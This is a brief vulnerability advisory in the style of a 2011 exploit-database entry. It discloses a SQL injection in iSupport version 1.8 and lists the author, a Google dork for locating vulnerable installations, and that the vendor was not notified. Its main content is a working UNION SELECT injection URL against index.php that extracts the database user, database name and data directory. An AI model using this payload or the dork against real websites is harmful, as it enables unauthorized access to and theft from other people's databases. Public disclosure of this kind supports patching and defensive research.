18 lines
No EOL
604 B
Text
18 lines
No EOL
604 B
Text
iSupport 1.8 SQL Injection Vulnerability
|
|
|
|
# Date: 2011-06-23
|
|
# Author: Brendan Coles <bcoles@gmail.com>
|
|
# Advisory: http://itsecuritysolutions.org/2011-06-23-iSupport-1.8-SQL-Injection-Vulnerability/
|
|
|
|
# Software: iSupport
|
|
# Version: <= 1.8
|
|
# Homepage: http://www.idevspot.com/iSupport.php
|
|
# Google Dork: "Powered by [ iSupport 1.8 ]"
|
|
|
|
# Vendor: idevSpot
|
|
# Homepage: http://www.idevspot.com/
|
|
# Notified: Unnotified
|
|
|
|
# SQL Injection:
|
|
|
|
http://localhost/[PATH]/index.php?include_file=knowledgebase_list.php&x_category=null union select null,concat(user(),0x3a,database(),0x3a,@@datadir),null,null,null,null-- |